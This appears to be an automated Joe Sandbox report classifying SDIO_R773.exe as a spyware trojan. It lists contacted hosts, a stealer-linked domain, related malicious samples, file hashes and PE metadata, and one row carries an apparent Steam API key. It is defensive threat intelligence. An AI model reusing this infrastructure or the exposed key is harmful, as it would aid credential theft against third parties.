                                                                                                                                                                                                            https://www.dropbox.com/jsSDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://docs.google.com/document/fsip/SDIO_R773.exe, 00000000.00000003.2060608569.000000000488D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://www.dropbox.com/scl/fi/tzw461qf44namwoprtqi1/channels424_banner.jpg?rlkey=ggwr95slh92f24jnfjSDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&ampSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://api.steampowered.com/SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://store.steampowered.com/mobileSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high

                                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                        162.125.66.18
                                                                                                                                                                                                                        		www-env.dropbox-dns.comUnited States
                                                                                                                                                                                                                        		19679DROPBOXUSfalse
                                                                                                                                                                                                                        104.102.49.254
                                                                                                                                                                                                                        		steamcommunity.comUnited States
                                                                                                                                                                                                                        		16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                        104.21.64.1
                                                                                                                                                                                                                        		sputnik-1985.comUnited States
                                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                        162.125.66.15
                                                                                                                                                                                                                        		edge-block-www-env.dropbox-dns.comUnited States
                                                                                                                                                                                                                        		19679DROPBOXUSfalse

                                                                                                                                                                                                                        General Information

                                                                                                                                                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                        Analysis ID:1589146
                                                                                                                                                                                                                        Start date and time:2025-01-11 11:55:06 +01:00
                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                        Overall analysis duration:0h 5m 3s
                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                        Number of analysed new started processes analysed:4
                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                        Sample name:SDIO_R773.exe
                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@2/2@12/4
                                                                                                                                                                                                                        EGA Information:Failed
                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                                                                                        • Number of non-executed functions: 3
                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                                        • Stop behavior analysis, all processes terminated

                                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                        • Execution Graph export aborted for target SDIO_R773.exe, PID 7528 because there are no executed function
                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                        05:56:09API Interceptor11x Sleep call for process: SDIO_R773.exe modified

                                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                                        IPs

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        162.125.66.18Message.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          https://docsend.com/view/sutbz9ibkqcisjtvGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            Jeffparish.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              Remittance details.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                Remittance details.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        https://www.dropbox.com/l/scl/AACfaxhMBCajpVJfxiny0jrZK6hv1s8xd2MGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          bose18mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                                                            104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                                            • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                                            http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                                                            104.21.64.1SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                            • www.mffnow.info/0pqe/
                                                                                                                                                                                                                                            4sfN3Gx1vO.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                            • www.vilakodsiy.sbs/w7eo/
                                                                                                                                                                                                                                            1162-201.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                            • www.mzkd6gp5.top/utww/
                                                                                                                                                                                                                                            QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                            • www.mzkd6gp5.top/3u0p/
                                                                                                                                                                                                                                            Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • ordrr.statementquo.com/QCbxA/
                                                                                                                                                                                                                                            SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                                                                                            • adsfirm.com/administrator/index.php
                                                                                                                                                                                                                                            PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                            • www.bser101pp.buzz/v89f/

                                                                                                                                                                                                                                            Domains

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            sputnik-1985.com4kN17cL4Tn.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.96.1
                                                                                                                                                                                                                                            5tmmrpv3dn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 104.21.16.1
                                                                                                                                                                                                                                            b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.96.1
                                                                                                                                                                                                                                            Q7QR4k52HL.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                                                            xNuh0DUJaG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.32.1
                                                                                                                                                                                                                                            HouseholdsClicking.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                            FeedStation.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.112.1
                                                                                                                                                                                                                                            DodSussex.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                            edge-block-www-env.dropbox-dns.comvEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            hnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                            • 162.125.65.15
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.69.15
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.69.15
                                                                                                                                                                                                                                            hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                            • 162.125.69.15
                                                                                                                                                                                                                                            De17De16.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                            • 162.125.69.15
                                                                                                                                                                                                                                            fghdsdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                            • 162.125.69.15
                                                                                                                                                                                                                                            hnghksdjfhs19De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                            • 162.125.69.15
                                                                                                                                                                                                                                            jhsdgfjkh236.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                            • 162.125.69.15
                                                                                                                                                                                                                                            kjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                            • 162.125.69.15
                                                                                                                                                                                                                                            steamcommunity.com176.113.115.170_3.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            4kN17cL4Tn.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            5tmmrpv3dn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            Q7QR4k52HL.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            xNuh0DUJaG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            www-env.dropbox-dns.comMessage.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            https://docsend.com/view/sutbz9ibkqcisjtvGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            Jeffparish.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            sEG2xXpg0X.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.3.18
                                                                                                                                                                                                                                            Remittance details.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            Remittance details.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18

                                                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            DROPBOXUSMessage.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.1.20
                                                                                                                                                                                                                                            https://docsend.com/view/sutbz9ibkqcisjtvGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            Jeffparish.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            sEG2xXpg0X.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.3.18
                                                                                                                                                                                                                                            Remittance details.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            Remittance details.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            AKAMAI-ASUS176.113.115.170_3.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            4kN17cL4Tn.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            5tmmrpv3dn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            Q7QR4k52HL.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            xNuh0DUJaG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            Bontrageroutdoors_Project_Update_202557516.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 96.17.64.171
                                                                                                                                                                                                                                            invoice_AG60538.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 96.17.64.171
                                                                                                                                                                                                                                            CLOUDFLARENETUSQsBdpe1gK5.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                                                                            HN1GiQ5tF7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                            • 104.21.41.74
                                                                                                                                                                                                                                            qbSIgCrCgw.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                            • 172.67.186.192
                                                                                                                                                                                                                                            4kN17cL4Tn.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.76.57
                                                                                                                                                                                                                                            kAsh3nmsgs.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                                            • 104.26.13.205
                                                                                                                                                                                                                                            5tmmrpv3dn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 104.21.16.1
                                                                                                                                                                                                                                            bIcqeSVPW6.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                            • 104.21.38.192
                                                                                                                                                                                                                                            mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                            • 104.21.16.1
                                                                                                                                                                                                                                            xaqnaB0rcW.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                            • 104.21.54.126
                                                                                                                                                                                                                                            8L6MBxaJ2m.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                                                            DROPBOXUSMessage.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.1.20
                                                                                                                                                                                                                                            https://docsend.com/view/sutbz9ibkqcisjtvGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            Jeffparish.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            sEG2xXpg0X.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.3.18
                                                                                                                                                                                                                                            Remittance details.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            Remittance details.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18

                                                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e1176.113.115.170_3.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            4kN17cL4Tn.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            5tmmrpv3dn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            Q7QR4k52HL.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            xNuh0DUJaG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            Full-Ver_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            • 162.125.66.15

                                                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                                                            No context

                                                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\NOUBJXTSUL2YOW34.exe

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SDIO_R773.exe
                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (410)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1005
                                                                                                                                                                                                                                            Entropy (8bit):4.9698836036542575
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:hYjkspFAunWDg5+DCpdgc6olL3lX8YDUdwlKXG/PEuXW:4plVl68lL14
                                                                                                                                                                                                                                            MD5:1E8AC4ADD8592CABAA50DFB8581608D2
                                                                                                                                                                                                                                            SHA1:EBE49951ACE4227AB233D9FD6218A9D8907118B8
                                                                                                                                                                                                                                            SHA-256:83622A0678D9F991CE9E6F9F2690A93504E2FC58128156C4C4B2358B372572ED
                                                                                                                                                                                                                                            SHA-512:8A3F7BADCF10D38D9545174651CDE383F5C035578C9D3D451DB2FFF8CC73907582EA1B233BB9F68FA988B5D615A601ECB12ECC735D7645725A7F489AB5A15696
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html>.<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">.<meta name="viewport" content="width=device-width, initial-scale=1" />.<title>Dropbox - 400</title>.<link href="https://cfl.dropboxstatic.com/static/metaserver/static/css/error.css" rel="stylesheet" type="text/css"/>.<link rel="shortcut icon" href="https://cfl.dropboxstatic.com/static/images/favicon.ico"/>.</head>.<body>.<div class="figure">.<img src="https://assets.dropbox.com/www/en-us/illustrations/spot/target-miss.svg" alt="Error: 400"/>.</div>.<div id="errorbox">.<h1>Error (400)</h1>Something went wrong. Don't worry, your files are still safe and the Dropbox team has been notified. Check out our <a href="https://status.dropbox.com">Status Page</a> to see if there is a known incident, our <a href="https://www.dropbox.com/help">Help Center</a> and <a href="https://forums.dropbox.com">forums</a> for help, or head back to <a href="https://www.dropbox.com/home">home</a>..</div>..</body>.</h

                                                                                                                                                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SDIO_R773.exe
                                                                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                                                                                            Entropy (8bit):4.462936224014049
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:LIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN2dwBCswSbn:MXD94+WlLZMM6YFHg+n
                                                                                                                                                                                                                                            MD5:FDA89E1A1A4B80AF60C74795B62C0406
                                                                                                                                                                                                                                            SHA1:0DFF311741FDE402EB57EEE1C53A9D12A1E1C138
                                                                                                                                                                                                                                            SHA-256:1D550192CDCEAEAFF52791FD1BA59969DBB5A80383B488AD0F9C705989B61D95
                                                                                                                                                                                                                                            SHA-512:3BFBA0DDCDA44F79B923CE467323E4D5FA8B027444F6000E917822F4B62C5C8B9A5BDEEBB56F4758EBF86180F750529D702FBF4578AB282A3EBD4653FF1DE356
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...{.d...............................................................................................................................................................................................................................................................................................................................................e.O........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                            Entropy (8bit):6.657834591055657
                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.55%
                                                                                                                                                                                                                                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                            • VXD Driver (31/22) 0.00%
                                                                                                                                                                                                                                            File name:SDIO_R773.exe
                                                                                                                                                                                                                                            File size:5'304'144 bytes
                                                                                                                                                                                                                                            MD5:c45a36ec4b4f8d8412c60db459c2b9d2
                                                                                                                                                                                                                                            SHA1:5c67453947128df910b46d5356f2ac5a8bae0cc9
                                                                                                                                                                                                                                            SHA256:24a26ac9cd209bf84831dae7d778fceb46b1e30b48454c130a6e62accdc1369e
                                                                                                                                                                                                                                            SHA512:c1250b9ccdee087433b1ccb1b277a8cc97dff16aeb99ce366356eecb457910297a3e592c1e379f566dfbdaa565f1b347a65c828a3072825f0457b1e7ddb72c1f
                                                                                                                                                                                                                                            SSDEEP:98304:JvoSyiXIQu22Q+LFmIFSy3WNxB5PlRqt+0GIKMZgOaP3oL+M1p+Plrdfoh:Jv19XLu22r0IFf3WTPlot+0hSr3oL+M7
                                                                                                                                                                                                                                            TLSH:F4366D5AFB4365F4F52356718A4FE77F8B146E368022DD6BFB0EEA08B4735162809312
                                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!Rg..................1..RK...............1...@...........................S.......Q....... ............................

                                                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                                                            Icon Hash:96130b9632311b19

                                                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Entrypoint:0x4014a0
                                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                                                                                                                                                            DLL Characteristics:
